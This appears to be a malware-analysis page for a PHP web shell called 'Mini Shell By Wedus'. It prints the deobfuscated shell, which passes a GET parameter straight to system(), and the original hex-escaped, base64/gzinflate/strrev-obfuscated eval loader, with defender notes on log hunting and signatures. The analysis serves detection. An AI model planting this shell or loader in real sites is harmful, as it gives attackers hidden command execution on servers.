PHP Malware Analysis


Tags

Title
Mini Shell By Wedus
Execution
system
Input
_GET

Deobfuscated code

<?php

// Analyst note: this listing is deobfuscator output for a small web shell.
// $W3dus and $Code hold encoded payload strings; the braces after `eval` show
// the code that PHPDeobfuscator recovered as the eval() payload.
// Default Password: WedusCok
// NOTE(review): nothing in the recovered body compares input against this
// value or any other secret, so the "password" appears to be a label only.
// The intermediate decode stage is not shown on this page; confirm there.
$W3dus = "s9ZEAqkp+c4qGmWpRUUlxRpATnJqSryJWWpxYpJGakliTlpeZlU6bnE4q7g4taggNz85rxSdg0MNXFhBT10tvcTaXl0jJ7EsFQA=";
$Code = "Xs+6wTGdzebDJ4T71Q+MElIWR66w+KwUqj7Ym2dhF0Z7XJhGoj+G2L7wC5Qqlb3z7eMUR7smo+xHEkrZS+TQfbfQvjCTY0b1HRH/iNvATmjldGdjKW/Ety4FP8787ZzqupNWiAwSlqvwQFmZeVzxkdXHuIlia16bajqPrgB+cYPGXfQ3rAjvqoIyHz5/J14UFr5h7F1YET1I9kzFqdpv69XMRzDAwG4DNahmqYP6hVRv6Kfil4E0j1v0FaxSnKhNozsgc5w2j0RUtANMSA9Ur3v1OZ/TnC3mi8x9JRXlFtghJGB6tyTs9orcX7ev+F3+qC3gc/ROyZTTg2ajXAePK94Ip021gEc2nuhOzMluZNHCv9/cGgUJXCyQgimGFm6gGxgyuRF4XZKBlwkH45VXlnpzntu4QNW1KpRtYnmqhUtUjQcWLWqGQJ7DQDAAwMklL/cJ";
// `eval /* ... */ { ... }` is the deobfuscator's notation for "this is what
// eval() received"; it is not valid PHP and the listing is for reading only.
// The HTML that follows is a form with no method or action attribute, so it
// submits by GET to the same URL and the "Wedus" field lands in the query
// string, which normally appears in web-server access logs.
eval /* PHPDeobfuscator eval output */ {
    ?><!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Mini Shell By Wedus</title>
</head>

<body><center>

    <form>
    <label for="Password"></label>
    <input type="text" name="Wedus" placeholder="Password" />
    <input type="submit" value="Gas" />
    </form>
</center>
</body>
</html>

<?php 
    // Execution sink: the raw "Wedus" query parameter goes straight to system()
    // with no authentication, validation or escaping. Any request that carries
    // the parameter runs its value as an OS command under the web server's
    // account.
    // Defender notes: hunt access logs for requests with a "Wedus" query
    // parameter and for responses containing the page title above. Treat any
    // host serving this file as compromised. Restricting system() through
    // disable_functions limits this sink where the application allows it.
    if (isset($_GET['Wedus'])) {
        echo "<pre>";
        // system() already prints the command output and returns its last line,
        // so the surrounding echo repeats that final line once more.
        echo system($_GET['Wedus']);
        echo "</pre>";
    }
};


Original code

<?php
// Analyst note: this is the sample as found on disk, a two-variable loader
// followed by a single eval().
// Default Password: WedusCok
// NOTE(review): the deobfuscated listing on this page shows no comparison
// against this value, so it should not be read as an access control.
// The \xNN sequences in the double-quoted strings are ordinary hex escapes
// (\x41 is "A", \x2b is "+", \x3d is "="). PHP resolves them when parsing,
// leaving plain base64 text. Signatures written against the resolved string
// will miss this on-disk form unless the escapes are normalized first.
$W3dus = "s9ZE\x41qkp\x2b\x634qGmWpRUUlxRp\x41TnJqSryJWWpxYpJG\x61kliTlpeZlU6\x62nE4q7g4t\x61ggNz85rxSdg0MNXFh\x42T10tv\x63T\x61Xl0jJ7EsFQ\x41\x3d";
// $Code is not referenced by the eval() line below; presumably the first-stage
// code decoded from $W3dus consumes it. That stage is not shown on this page,
// so verify by decoding offline.
$Code = "Xs\x2b6wTGdze\x62DJ4T71Q\x2bMElIWR66w\x2bKwUqj7Ym2dhF0Z7XJhGoj\x2bG2L7w\x435Qql\x623z7eMUR7smo\x2bxHEkrZS\x2bTQf\x62fQvj\x43TY0\x621HRH/iNv\x41TmjldGdjKW/Ety4FP8787ZzqupNWi\x41wSlqvwQFmZeVzxkdXHuIli\x6116\x62\x61jqPrg\x42\x2b\x63YPGXfQ3r\x41jvqoIyHz5/J14UFr5h7F1YET1I9kzFqdpv69XMRzD\x41wG4DN\x61hmqYP6hVRv6Kfil4E0j1v0F\x61xSnKhNozsg\x635w2j0RUt\x41NMS\x419Ur3v1OZ/Tn\x433mi8x9JRXlFtghJG\x426tyTs9or\x63X7ev\x2bF3\x2bq\x433g\x63/ROyZTTg2\x61jX\x41ePK94Ip021gE\x632nuhOzMluZNH\x43v9/\x63GgUJX\x43yQgimGFm6gGxgyuRF4XZK\x42lwkH45VXlnpzntu4QNW1KpRtYnmqhUtUjQ\x63WLWqGQJ7DQD\x41\x41wMklL/\x63J";
// Decode chain, innermost first: base64_decode, gzinflate,
// htmlspecialchars_decode, strrev, then eval() of the result. The nested call
// pattern eval(strrev(htmlspecialchars_decode(gzinflate(base64_decode(...)))))
// is itself a useful static indicator when scanning a web root. Analyse
// samples by replacing eval with a print in an isolated environment, never by
// running them.
eval(strrev(htmlspecialchars_decode(gzinflate(base64_decode($W3dus)))));